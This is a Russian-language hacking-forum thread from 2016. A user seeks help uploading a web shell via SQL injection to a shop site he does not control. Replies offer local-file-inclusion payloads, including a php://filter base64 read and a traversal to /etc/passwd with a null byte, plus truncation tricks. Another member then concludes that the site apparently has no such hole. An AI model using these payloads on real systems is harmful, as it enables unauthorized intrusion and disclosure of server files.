HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.01.2016, 23:38
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
Провел на форуме:
65956

Репутация: 0
По умолчанию

Подскажите как можно залить шелл через скулю,не имея доступа к админке.Может есть софт?
 
Ответить с цитированием

  #2  
Старый 03.01.2016, 02:42
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от .Light.  

Подскажите как можно залить шелл через скулю,не имея доступа к админке.Может есть софт?
если у пользователя есть доступ к file_priv. это все описано в статьях
 
Ответить с цитированием

  #3  
Старый 04.01.2016, 17:38
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
Провел на форуме:
65956

Репутация: 0
По умолчанию

Что можно сделать с этим?

Warning: require(includes/languages/.php): failed to open stream: No such file or directory in /home/piercing/data/www//shop/includes/application_top.php on line 291

Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in /home/piercing/data/www//shop/includes/application_top.php on line 291
 
Ответить с цитированием

  #4  
Старый 04.01.2016, 19:53
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
Провел на форуме:
65956

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  

Обыкновенная AFR же. С суффиксом, разве что, может быть помучаешься, если MQ on.
%00
././[4096]././
Можно по подробнее?
 
Ответить с цитированием

  #5  
Старый 04.01.2016, 21:02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

у вас инклуд или что? покажите полностью запрос и ответ
 
Ответить с цитированием

  #6  
Старый 04.01.2016, 22:25
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
Провел на форуме:
65956

Репутация: 0
По умолчанию

http://www./shop/info.php?id=1'

Warning: require(includes/languages/.php): failed to open stream: No such file or directory in/home/piercing/data/www//shop/includes/application_top.php on line 291

Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in/home/piercing/data/www//shop/includes/application_top.php on line 291
 
Ответить с цитированием

  #7  
Старый 04.01.2016, 23:00
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от .Light.  

http://www./shop/info.php?id=1
'
Warning
: require(includes/languages/.php): failed to open stream: No such file or directory in
/home/piercing/data/www//shop/includes/application_top.php
on line
291
Fatal error
: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in
/home/piercing/data/www//shop/includes/application_top.php
on line
291
попробуй так

http://www./shop/info.php?id=php://filter/convert.base64-encode/resource=../index

или так

http://www./shop/info.php?id=../../../etc/passwd%00
 
Ответить с цитированием

  #8  
Старый 05.01.2016, 11:11
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
Провел на форуме:
65956

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
Тоже самое(

Warning: require(includes/languages/.php): failed to open stream: No such file or directory in/home/piercing/data/www//shop/includes/application_top.php on line 291

Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in/home/piercing/data/www//shop/includes/application_top.php on line 291
 
Ответить с цитированием

  #9  
Старый 05.01.2016, 13:33
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от BabaDook  
где вы видите, что строка из запроса попадает в include? ошибка всегда одна
 
Ответить с цитированием

  #10  
Старый 05.01.2016, 13:55
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от yarbabin  

где вы видите, что строка из запроса попадает в include? ошибка всегда одна
Точно.

Извиняюсь за лже показания, раз yarbabin говорит что нет уязвимости, значит её нету
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.